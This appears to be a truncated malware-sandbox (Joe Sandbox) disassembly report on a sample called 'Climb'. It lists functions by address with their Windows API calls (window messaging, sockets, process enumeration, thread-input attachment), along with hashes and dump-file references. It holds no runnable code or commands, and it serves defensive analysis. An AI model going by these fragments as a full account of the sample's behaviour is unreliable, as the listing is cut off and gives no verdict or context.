                                                                                                                                                                          • Opcode ID: 96ccaea5e841e11c15546e4d93bf06f76e770109e419dcd00fe3d732ee4f95d2
                                                                                                                                                                          • Instruction ID: 9e4d7be81185226f70c1ea532e021109a725c9c9d987fbb07b1c03e8ec98ddde
                                                                                                                                                                          • Opcode Fuzzy Hash: 96ccaea5e841e11c15546e4d93bf06f76e770109e419dcd00fe3d732ee4f95d2
                                                                                                                                                                          • Instruction Fuzzy Hash: 1F31BC71210205AFDF218F38DC45BEA7BA9EF09338F204724F979A21E1CB70AC949B50
                                                                                                                                                                          APIs
                                                                                                                                                                            • Part of subcall function 00133DB8: WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,00000000,00000000,00000000,00000000,?,?,?,?,?,00133AD4,?,?), ref: 00133DD5
                                                                                                                                                                          • inet_addr.WSOCK32(?,?,?,?,?,00000000), ref: 00133AD7
                                                                                                                                                                          • _wcslen.LIBCMT ref: 00133AF8
                                                                                                                                                                          • htons.WSOCK32(00000000,?,?,00000000), ref: 00133B63
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000015.00000002.2506411161.00000000000B1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 000B0000, based on PE: true
                                                                                                                                                                          • Associated: 00000015.00000002.2506297070.00000000000B0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                          • Associated: 00000015.00000002.2506585434.000000000014D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                          • Associated: 00000015.00000002.2506585434.0000000000173000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                          • Associated: 00000015.00000002.2506749154.000000000017D000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                          • Associated: 00000015.00000002.2506829293.0000000000185000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_21_2_b0000_Climb.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: ByteCharMultiWide_wcslenhtonsinet_addr
                                                                                                                                                                          • String ID: 255.255.255.255
                                                                                                                                                                          • API String ID: 946324512-2422070025
                                                                                                                                                                          • Opcode ID: 820d3de284c79751e8aef4b22a1a8399b7996923f2a6c5748badedb3d3bf9ff9
                                                                                                                                                                          • Instruction ID: 83b3db65bca55d74d569cdf3eb783fd90610ee4241a66652a60b2c4ed3205b0e
                                                                                                                                                                          • Opcode Fuzzy Hash: 820d3de284c79751e8aef4b22a1a8399b7996923f2a6c5748badedb3d3bf9ff9
                                                                                                                                                                          • Instruction Fuzzy Hash: 6D31B3396002019FCB10CF68C585EA9BBF0EF15328F258159E8269B7A6D771EE45C764
                                                                                                                                                                          APIs
                                                                                                                                                                          • SendMessageW.USER32(00000000,00001009,00000000,?), ref: 001449DC
                                                                                                                                                                          • SetWindowPos.USER32(?,00000000,?,?,?,?,00000004), ref: 001449F0
                                                                                                                                                                          • SendMessageW.USER32(?,00001002,00000000,?), ref: 00144A14
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000015.00000002.2506411161.00000000000B1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 000B0000, based on PE: true
                                                                                                                                                                          • Associated: 00000015.00000002.2506297070.00000000000B0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                          • Associated: 00000015.00000002.2506585434.000000000014D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                          • Associated: 00000015.00000002.2506585434.0000000000173000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                          • Associated: 00000015.00000002.2506749154.000000000017D000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                          • Associated: 00000015.00000002.2506829293.0000000000185000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_21_2_b0000_Climb.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: MessageSend$Window
                                                                                                                                                                          • String ID: SysMonthCal32
                                                                                                                                                                          • API String ID: 2326795674-1439706946
                                                                                                                                                                          • Opcode ID: 2630c33a7fc457779072fde2104991e94d6fd3a52746fd8ffc861fe8ab6208f8
                                                                                                                                                                          • Instruction ID: 339238de34687a6f50f03c4175bfdd6f8bad5b9f5076f8a91fd1d68f53bd16f3
                                                                                                                                                                          • Opcode Fuzzy Hash: 2630c33a7fc457779072fde2104991e94d6fd3a52746fd8ffc861fe8ab6208f8
                                                                                                                                                                          • Instruction Fuzzy Hash: 0E21BF32650229BBDF158F50DC46FEB3B69EF48718F110214FA156B1E0DBB1A8919B90
                                                                                                                                                                          APIs
                                                                                                                                                                          • SendMessageW.USER32(00000000,00000469,?,00000000), ref: 001451A3
                                                                                                                                                                          • SendMessageW.USER32(00000000,00000465,00000000,80017FFF), ref: 001451B1
                                                                                                                                                                          • DestroyWindow.USER32(00000000,00000000,?,?,?,00000000,msctls_updown32,00000000,00000000,00000000,00000000,00000000,00000000,?,?,00000000), ref: 001451B8
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000015.00000002.2506411161.00000000000B1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 000B0000, based on PE: true
                                                                                                                                                                          • Associated: 00000015.00000002.2506297070.00000000000B0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                          • Associated: 00000015.00000002.2506585434.000000000014D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                          • Associated: 00000015.00000002.2506585434.0000000000173000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                          • Associated: 00000015.00000002.2506749154.000000000017D000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                          • Associated: 00000015.00000002.2506829293.0000000000185000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_21_2_b0000_Climb.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: MessageSend$DestroyWindow
                                                                                                                                                                          • String ID: msctls_updown32
                                                                                                                                                                          • API String ID: 4014797782-2298589950
                                                                                                                                                                          • Opcode ID: 563edf17774ade604fe7bababf19186e770bb8038abeccaf828f3fad9a0feae6
                                                                                                                                                                          • Instruction ID: 926894a4691aa924dcc2ed5295ed6fb668b104795c93a20133e0351173b18866
                                                                                                                                                                          • Opcode Fuzzy Hash: 563edf17774ade604fe7bababf19186e770bb8038abeccaf828f3fad9a0feae6
                                                                                                                                                                          • Instruction Fuzzy Hash: B12171B5600609AFDB11DF14DC81DBB37ADEF5A768B040059F9009B362CB70EC51CBA0
                                                                                                                                                                          APIs
                                                                                                                                                                          • SendMessageW.USER32(00000000,00000180,00000000,?), ref: 001442DC
                                                                                                                                                                          • SendMessageW.USER32(?,00000186,00000000,00000000), ref: 001442EC
                                                                                                                                                                          • MoveWindow.USER32(00000000,?,?,?,?,00000000,?,?,Listbox,00000000,00000000,?,?,?,?,?), ref: 00144312
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000015.00000002.2506411161.00000000000B1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 000B0000, based on PE: true
                                                                                                                                                                          • Associated: 00000015.00000002.2506297070.00000000000B0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                          • Associated: 00000015.00000002.2506585434.000000000014D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                          • Associated: 00000015.00000002.2506585434.0000000000173000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                          • Associated: 00000015.00000002.2506749154.000000000017D000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                          • Associated: 00000015.00000002.2506829293.0000000000185000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_21_2_b0000_Climb.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: MessageSend$MoveWindow
                                                                                                                                                                          • String ID: Listbox
                                                                                                                                                                          • API String ID: 3315199576-2633736733
                                                                                                                                                                          • Opcode ID: 39ad843e6e7e1792a5311f8bac6e09b277a85bc0500bc81dd0762a121dc6dc86
                                                                                                                                                                          • Instruction ID: 2eda7439a7a7744005abd6ab9931dfb59335b19935837cce5418a83312a9be50
                                                                                                                                                                          • Opcode Fuzzy Hash: 39ad843e6e7e1792a5311f8bac6e09b277a85bc0500bc81dd0762a121dc6dc86
                                                                                                                                                                          • Instruction Fuzzy Hash: A4216272654118BBEF118F94DC85FAF376EEF89754F118114F9059B1A0CBB19C5187A0
                                                                                                                                                                          APIs
                                                                                                                                                                          • SetErrorMode.KERNEL32(00000001), ref: 0012544D
                                                                                                                                                                          • GetVolumeInformationW.KERNEL32(?,?,00007FFF,?,00000000,00000000,00000000,00000000), ref: 001254A1
                                                                                                                                                                          • SetErrorMode.KERNEL32(00000000,?,?,0014DCD0), ref: 00125515
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000015.00000002.2506411161.00000000000B1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 000B0000, based on PE: true
                                                                                                                                                                          • Associated: 00000015.00000002.2506297070.00000000000B0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                          • Associated: 00000015.00000002.2506585434.000000000014D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                          • Associated: 00000015.00000002.2506585434.0000000000173000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                          • Associated: 00000015.00000002.2506749154.000000000017D000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                          • Associated: 00000015.00000002.2506829293.0000000000185000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_21_2_b0000_Climb.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: ErrorMode$InformationVolume
                                                                                                                                                                          • String ID: %lu
                                                                                                                                                                          • API String ID: 2507767853-685833217
                                                                                                                                                                          • Opcode ID: dddf9f4cbb3b070363e868831ece2161abe62f38b6dc1666d1d95d5eb67a949f
                                                                                                                                                                          • Instruction ID: 7c62f8d05ea617d103d19bd237a32fe704f7f0d0b6339615b4df127f8c37e17a
                                                                                                                                                                          • Opcode Fuzzy Hash: dddf9f4cbb3b070363e868831ece2161abe62f38b6dc1666d1d95d5eb67a949f
                                                                                                                                                                          • Instruction Fuzzy Hash: 9F314474A00109AFDB10DF54D885EEA77F9EF09304F1440A9F909DB262D775EE45CB61
                                                                                                                                                                          APIs
                                                                                                                                                                          • SendMessageW.USER32(00000000,00000405,00000000,00000000), ref: 00144CED
                                                                                                                                                                          • SendMessageW.USER32(?,00000406,00000000,00640000), ref: 00144D02
                                                                                                                                                                          • SendMessageW.USER32(?,00000414,0000000A,00000000), ref: 00144D0F
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000015.00000002.2506411161.00000000000B1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 000B0000, based on PE: true
                                                                                                                                                                          • Associated: 00000015.00000002.2506297070.00000000000B0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                          • Associated: 00000015.00000002.2506585434.000000000014D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                          • Associated: 00000015.00000002.2506585434.0000000000173000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                          • Associated: 00000015.00000002.2506749154.000000000017D000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                          • Associated: 00000015.00000002.2506829293.0000000000185000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_21_2_b0000_Climb.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: MessageSend
                                                                                                                                                                          • String ID: msctls_trackbar32
                                                                                                                                                                          • API String ID: 3850602802-1010561917
                                                                                                                                                                          • Opcode ID: 56fca99303c79fef23defac2ad4812c69bafd9665391639b517a14545e772664
                                                                                                                                                                          • Instruction ID: 4b0979954c20183cdbe883ad82bd175f6e0d735fbfbf8f3f5c04c886fc57061c
                                                                                                                                                                          • Opcode Fuzzy Hash: 56fca99303c79fef23defac2ad4812c69bafd9665391639b517a14545e772664
                                                                                                                                                                          • Instruction Fuzzy Hash: E611E071240248BFEF215F69CC46FAB3BA8EF99B65F110524FA55E20A0C771DC519B20
                                                                                                                                                                          APIs
                                                                                                                                                                            • Part of subcall function 000B8577: _wcslen.LIBCMT ref: 000B858A
                                                                                                                                                                            • Part of subcall function 001136F4: SendMessageTimeoutW.USER32(?,00000000,00000000,00000000,00000002,00001388,?), ref: 00113712
                                                                                                                                                                            • Part of subcall function 001136F4: GetWindowThreadProcessId.USER32(?,00000000), ref: 00113723
                                                                                                                                                                            • Part of subcall function 001136F4: GetCurrentThreadId.KERNEL32 ref: 0011372A
                                                                                                                                                                            • Part of subcall function 001136F4: AttachThreadInput.USER32(00000000,?,00000000,00000000), ref: 00113731
                                                                                                                                                                          • GetFocus.USER32 ref: 001138C4
                                                                                                                                                                            • Part of subcall function 0011373B: GetParent.USER32(00000000), ref: 00113746
                                                                                                                                                                          • GetClassNameW.USER32(?,?,00000100), ref: 0011390F
                                                                                                                                                                          • EnumChildWindows.USER32(?,00113987), ref: 00113937
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000015.00000002.2506411161.00000000000B1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 000B0000, based on PE: true
                                                                                                                                                                          • Associated: 00000015.00000002.2506297070.00000000000B0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                          • Associated: 00000015.00000002.2506585434.000000000014D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                          • Associated: 00000015.00000002.2506585434.0000000000173000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                          • Associated: 00000015.00000002.2506749154.000000000017D000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                          • Associated: 00000015.00000002.2506829293.0000000000185000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_21_2_b0000_Climb.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: Thread$AttachChildClassCurrentEnumFocusInputMessageNameParentProcessSendTimeoutWindowWindows_wcslen
                                                                                                                                                                          • String ID: %s%d
                                                                                                                                                                          • API String ID: 1272988791-1110647743
                                                                                                                                                                          • Opcode ID: 765ab9b07201fbd7f9320a147f5544e91fa69543e2ea8897ae8ab4f1cd89b987
                                                                                                                                                                          • Instruction ID: bdfa0c35121dee66b9705815f8a1c4c552c8b6c48a4c9fa1a6926ccd5695c8a2
                                                                                                                                                                          • Opcode Fuzzy Hash: 765ab9b07201fbd7f9320a147f5544e91fa69543e2ea8897ae8ab4f1cd89b987
                                                                                                                                                                          • Instruction Fuzzy Hash: 7711D5B5600209ABCF15BF749C85AED776EAF94304F008079F9199B2A6DF705A85CB20
                                                                                                                                                                          APIs
                                                                                                                                                                          • GetMenuItemInfoW.USER32(?,?,?,00000030), ref: 00146360
                                                                                                                                                                          • SetMenuItemInfoW.USER32(?,?,?,00000030), ref: 0014638D
                                                                                                                                                                          • DrawMenuBar.USER32(?), ref: 0014639C
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000015.00000002.2506411161.00000000000B1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 000B0000, based on PE: true
                                                                                                                                                                          • Associated: 00000015.00000002.2506297070.00000000000B0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                          • Associated: 00000015.00000002.2506585434.000000000014D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                          • Associated: 00000015.00000002.2506585434.0000000000173000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                          • Associated: 00000015.00000002.2506749154.000000000017D000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                          • Associated: 00000015.00000002.2506829293.0000000000185000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_21_2_b0000_Climb.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: Menu$InfoItem$Draw
                                                                                                                                                                          • String ID: 0
                                                                                                                                                                          • API String ID: 3227129158-4108050209
                                                                                                                                                                          • Opcode ID: 319f36b69e996f6cfa31d7de896de8e1b567a2c4f72f5328da8f65a90630e6be
                                                                                                                                                                          • Instruction ID: 20f49ad36ede64eb694307613ec73d746d6d2f754abba8403fc9b113a54f65d8
                                                                                                                                                                          • Opcode Fuzzy Hash: 319f36b69e996f6cfa31d7de896de8e1b567a2c4f72f5328da8f65a90630e6be
                                                                                                                                                                          • Instruction Fuzzy Hash: 76016D35500258AFDF119F11DC84BAE7BB5FB46355F10809AE84DDA161DF308A85EF32
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000015.00000002.2506411161.00000000000B1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 000B0000, based on PE: true
                                                                                                                                                                          • Associated: 00000015.00000002.2506297070.00000000000B0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                          • Associated: 00000015.00000002.2506585434.000000000014D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                          • Associated: 00000015.00000002.2506585434.0000000000173000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                          • Associated: 00000015.00000002.2506749154.000000000017D000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                          • Associated: 00000015.00000002.2506829293.0000000000185000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_21_2_b0000_Climb.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID:
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID:
                                                                                                                                                                          • Opcode ID: 18d88eeea90cd1e22047b4baa4729bca7dcf8a00514988669687f4f3fb3bf043
                                                                                                                                                                          • Instruction ID: eb8f94da40758f4d8ecad06426a97b1532fdcabe9b88a27395ce3a58d69a8df0
                                                                                                                                                                          • Opcode Fuzzy Hash: 18d88eeea90cd1e22047b4baa4729bca7dcf8a00514988669687f4f3fb3bf043
                                                                                                                                                                          • Instruction Fuzzy Hash: BBC14875E0020AAFCB09CF94C894BAAB7B5FF48704F1585A8E505AB251D7B1EEC1DB90
                                                                                                                                                                          APIs
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000015.00000002.2506411161.00000000000B1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 000B0000, based on PE: true
                                                                                                                                                                          • Associated: 00000015.00000002.2506297070.00000000000B0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                          • Associated: 00000015.00000002.2506585434.000000000014D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                          • Associated: 00000015.00000002.2506585434.0000000000173000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                          • Associated: 00000015.00000002.2506749154.000000000017D000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                          • Associated: 00000015.00000002.2506829293.0000000000185000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_21_2_b0000_Climb.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: __alldvrm$_strrchr
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 1036877536-0
                                                                                                                                                                          • Opcode ID: 65ac5c1fffd7beff7dffafb7e38bd52ffe3f80321006b0a9665303c455145bc9
                                                                                                                                                                          • Instruction ID: 55a8fb7a9e97197d204e17830a6fac5366e04eb89b77af5fdefbf3b59cc62e0e
                                                                                                                                                                          • Opcode Fuzzy Hash: 65ac5c1fffd7beff7dffafb7e38bd52ffe3f80321006b0a9665303c455145bc9
                                                                                                                                                                          • Instruction Fuzzy Hash: BDA14971E003C69FDB21DF2AC8917AEBBE5EF55314F1441ADE695AB282C3389941C750
                                                                                                                                                                          APIs
                                                                                                                                                                          • ProgIDFromCLSID.OLE32(?,00000000,?,00000000,00000800,00000000,?,00150BD4,?), ref: 00110EE0
                                                                                                                                                                          • CoTaskMemFree.OLE32(00000000,00000000,?,00000000,00000800,00000000,?,00150BD4,?), ref: 00110EF8
                                                                                                                                                                          • CLSIDFromProgID.OLE32(?,?,00000000,0014DCE0,000000FF,?,00000000,00000800,00000000,?,00150BD4,?), ref: 00110F1D
                                                                                                                                                                          • _memcmp.LIBVCRUNTIME ref: 00110F3E
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000015.00000002.2506411161.00000000000B1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 000B0000, based on PE: true
                                                                                                                                                                          • Associated: 00000015.00000002.2506297070.00000000000B0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                          • Associated: 00000015.00000002.2506585434.000000000014D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                          • Associated: 00000015.00000002.2506585434.0000000000173000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                          • Associated: 00000015.00000002.2506749154.000000000017D000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                          • Associated: 00000015.00000002.2506829293.0000000000185000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_21_2_b0000_Climb.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: FromProg$FreeTask_memcmp
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 314563124-0
                                                                                                                                                                          • Opcode ID: 409e2e7ece5ebb5226e37f6ff46a0e545d86b858f620ada2be0dacf79f6fb21f
                                                                                                                                                                          • Instruction ID: d148cd4e24fae647b09f458f29d87a58bd1fd0e7a5974aba8b5c754c3eec616c
                                                                                                                                                                          • Opcode Fuzzy Hash: 409e2e7ece5ebb5226e37f6ff46a0e545d86b858f620ada2be0dacf79f6fb21f
                                                                                                                                                                          • Instruction Fuzzy Hash: A9811B75A00109EFCB05DF94C984EEEB7B9FF89315F204568F506AB250DB71AE86CB60
                                                                                                                                                                          APIs
                                                                                                                                                                          • CreateToolhelp32Snapshot.KERNEL32 ref: 0013B10C
                                                                                                                                                                          • Process32FirstW.KERNEL32(00000000,?), ref: 0013B11A
                                                                                                                                                                            • Part of subcall function 000BB329: _wcslen.LIBCMT ref: 000BB333
                                                                                                                                                                          • Process32NextW.KERNEL32(00000000,?), ref: 0013B1FC
                                                                                                                                                                          • CloseHandle.KERNEL32(00000000), ref: 0013B20B
                                                                                                                                                                            • Part of subcall function 000CE36B: CompareStringW.KERNEL32(00000409,00000001,?,00000000,00000000,?,?,00000000,?,000F4D73,?), ref: 000CE395
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000015.00000002.2506411161.00000000000B1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 000B0000, based on PE: true
                                                                                                                                                                          • Associated: 00000015.00000002.2506297070.00000000000B0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                          • Associated: 00000015.00000002.2506585434.000000000014D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                          • Associated: 00000015.00000002.2506585434.0000000000173000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                          • Associated: 00000015.00000002.2506749154.000000000017D000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                          • Associated: 00000015.00000002.2506829293.0000000000185000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_21_2_b0000_Climb.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: Process32$CloseCompareCreateFirstHandleNextSnapshotStringToolhelp32_wcslen
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 1991900642-0
                                                                                                                                                                          • Opcode ID: 5f3c31a078dd975a07ecb3ae6fc1edf2238c433f456df46c56e57fa7f575429b
                                                                                                                                                                          • Instruction ID: 2c0394d2fe597ea7780b63048b1486ce5279b14abd6a92ea5fc825b3c705b16d
                                                                                                                                                                          • Opcode Fuzzy Hash: 5f3c31a078dd975a07ecb3ae6fc1edf2238c433f456df46c56e57fa7f575429b
                                                                                                                                                                          • Instruction Fuzzy Hash: C1513B71608301AFD710EF24D886E9BBBE8FF89754F40491DF59997262EB70E904CB92
                                                                                                                                                                          APIs
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000015.00000002.2506411161.00000000000B1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 000B0000, based on PE: true
                                                                                                                                                                          • Associated: 00000015.00000002.2506297070.00000000000B0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                          • Associated: 00000015.00000002.2506585434.000000000014D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                          • Associated: 00000015.00000002.2506585434.0000000000173000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                          • Associated: 00000015.00000002.2506749154.000000000017D000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                          • Associated: 00000015.00000002.2506829293.0000000000185000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_21_2_b0000_Climb.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: _free
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 269201875-0
                                                                                                                                                                          • Opcode ID: 411ad1113060ace36ecbcc7fb0666e6d0b793e7f4cfa9524981d9de94b48402f
                                                                                                                                                                          • Instruction ID: 37b5a00213a9a302a6aa4b8fee50929257de00db43a96a242e3a6742ec1b9cd2
                                                                                                                                                                          • Opcode Fuzzy Hash: 411ad1113060ace36ecbcc7fb0666e6d0b793e7f4cfa9524981d9de94b48402f
                                                                                                                                                                          • Instruction Fuzzy Hash: 6C415C31604249EFDB207BBA9C41AFE36F4EF45770F144226F618D6A93DA35884262A1
                                                                                                                                                                          APIs
                                                                                                                                                                          • socket.WSOCK32(00000002,00000002,00000011), ref: 0013255A
                                                                                                                                                                          • WSAGetLastError.WSOCK32 ref: 00132568
                                                                                                                                                                          • #21.WSOCK32(?,0000FFFF,00000020,00000002,00000004), ref: 001325E7
                                                                                                                                                                          • WSAGetLastError.WSOCK32 ref: 001325F1
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000015.00000002.2506411161.00000000000B1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 000B0000, based on PE: true
                                                                                                                                                                          • Associated: 00000015.00000002.2506297070.00000000000B0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                          • Associated: 00000015.00000002.2506585434.000000000014D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                          • Associated: 00000015.00000002.2506585434.0000000000173000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                          • Associated: 00000015.00000002.2506749154.000000000017D000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                          • Associated: 00000015.00000002.2506829293.0000000000185000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_21_2_b0000_Climb.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: ErrorLast$socket
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 1881357543-0
                                                                                                                                                                          • Opcode ID: bc7a244547b8ea9239de905c0c44ca558b231a1c3c8de580ffab74236d92b153
                                                                                                                                                                          • Instruction ID: 5b984fe67287f5225697f6ef4eb2242cc4a65bc91e5b3c2383e88b77ce67ab75
                                                                                                                                                                          • Opcode Fuzzy Hash: bc7a244547b8ea9239de905c0c44ca558b231a1c3c8de580ffab74236d92b153
                                                                                                                                                                          • Instruction Fuzzy Hash: 0A419E74A00200AFE720AF24C886FAA77A5AF45758F54C45CF91A9F6D3D772ED42CB90
                                                                                                                                                                          APIs
                                                                                                                                                                          • GetWindowRect.USER32(00DEFC08,?), ref: 00146D1A
                                                                                                                                                                          • ScreenToClient.USER32(?,?), ref: 00146D4D
                                                                                                                                                                          • MoveWindow.USER32(?,?,?,?,000000FF,00000001,?,?,?,?,?), ref: 00146DBA
                                                                                                                                                                          Memory Dump Source
